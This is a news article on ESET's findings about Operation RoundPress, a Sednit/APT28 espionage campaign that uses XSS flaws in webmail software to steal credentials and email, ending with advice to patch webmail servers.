#
Russia-linked Hackers Target Webmail Servers in Ukraine-Related Espionage Operation
A recent investigation by ESET researchers has uncovered a sophisticated Russia-aligned espionage operation, dubbed RoundPress, which targets webmail servers via cross-site scripting (XSS) vulnerabilities. The operation is believed to be carried out by the Sednit group, also known as Fancy Bear or APT28, with the ultimate goal of stealing confidential data from specific email accounts.
##
The Operation: Compromise Chain
The RoundPress compromise chain involves a series of targeted attacks on webmail servers used by individuals and organizations related to the current war in Ukraine. These targets include Ukrainian governmental entities, defense companies in Bulgaria and Romania, African, EU, and South American governments.
According to ESET researcher Matthieu Faou, who discovered and investigated Operation RoundPress, the Sednit group has been using a variety of XSS vulnerabilities to target webmail software, including Horde, MDaemon, and Zimbra. The group has also recently started exploiting a vulnerability in Roundcube (CVE-2023-43770) to gain access to sensitive data.
##
The Attack Methodology
The Sednit group sends these XSS exploits by email, which leads to the execution of malicious JavaScript code in the context of the webmail client's web page running in a browser window. The exploit only targets data accessible from the target's account, making it difficult for the attacker to access sensitive information without permission.
To execute the exploit successfully, the target must be convinced to open the email message in the vulnerable webmail portal. This means that the email needs to bypass any spam filtering and have a convincing subject line that entices the target into reading the email message.
##
The Exploits and Payloads
The attackers unleash four JavaScript payloads upon the targets: SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA. These payloads are capable of:
* Credential stealing * Exfiltration of the address book, contacts, and log-in history * Exfiltration of email messages
Additionally, SpyPress.MDAEMON is able to set up a bypass for two-factor authentication protection, allowing the attackers to access the mailbox from a mail application using an app password.
##
The Background: The Sednit Group
The Sednit group, also known as APT28, Fancy Bear, Forest Blizzard, or Sofacy, has been operating since at least 2004. The group is believed to be behind several high-profile hacks, including the Democratic National Committee (DNC) hack before the 2016 U.S. elections and the hacking of global television network TV5Monde.
The group is also presumed to be responsible for the World Anti-Doping Agency (WADA) email leak and many other incidents. The fact that webmail servers have been a major target for several espionage groups, including Sednit, GreenCube, and Winter Vivern, highlights the vulnerability of these systems to remote exploitation via XSS vulnerabilities.
##
The Importance of Webmail Security
As ESET researcher Matthieu Faou explains, "many organizations don’t keep their webmail servers up to date, and because the vulnerabilities can be triggered remotely by sending an email message, it is very convenient for attackers to target such servers for email theft." This highlights the importance of keeping webmail servers and software up to date with the latest security patches and being cautious when receiving unsolicited emails.